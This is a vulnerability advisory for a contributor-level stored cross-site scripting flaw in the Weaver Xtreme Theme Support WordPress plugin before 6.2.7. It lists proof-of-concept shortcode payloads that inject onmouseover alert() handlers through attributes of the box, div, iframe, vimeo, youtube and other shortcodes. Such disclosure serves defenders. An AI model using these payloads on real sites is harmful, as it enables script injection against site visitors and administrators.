Weaver Xtreme Theme Support < 6.2.7 - Contributor+ Stored XSS

2023-03-2900:00:00

Lana Codes

xss

weaver xtreme

stored

contributor+

theme

wordpress

attributes

background

border

color

style

class

height

vimeo

youtube

site tagline

site title

0.001 Low

EPSS

Percentile

23.7%

JSON

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Required theme: https://wordpress.org/themes/weaver-xtreme

[box background='red" onmouseover="alert(/XSS-background/)"']
Other affected attributes (found when verifying the issue): border_rule, border_radius, color, margin, padding, style

Other affected shortcodes identified when verifying the issue:

[bloginfo style='"onmouseover=alert(/XSS-style/)//']

[div id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[span id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[header_image style='"onmouseover=alert(/XSS-style/)//']
Other affected attributes: h, w

[html args='onmouseover=alert(/XSS-args/) style=display:block;width:100px;height:100px;background:red']

[iframe src='"onmouseover=alert(/XSS-src/)//']
[iframe src='1' height='"onmouseover=alert(/XSS-height/)//']
Other affected attributes: percent, style

[site_tagline style='"onmouseover=alert(/XSS-style/)//']

[site_title style='"onmouseover=alert(/XSS-style/)//']

[vimeo id='"onmouseover=alert(/XSS-id/)//']
[vimeo id='1' color='"onmouseover=alert(/XSS-color/)//']
Other affected attributes: percent

[youtube id='"onmouseover=alert(/XSS-id/)//']
[youtube id='1' autohide='"onmouseover=alert(/XSS-autohide/)//']
Other affected attributes: color, color1, color2, end, fs, iv_load_policy, origin, percent, playlist, rel, showinfo, start, wmode

0.001 Low

EPSS

Percentile

23.7%

JSON

Related for WPEX-ID:D00824A3-7DF5-4B52-A31B-5FDFB19C970F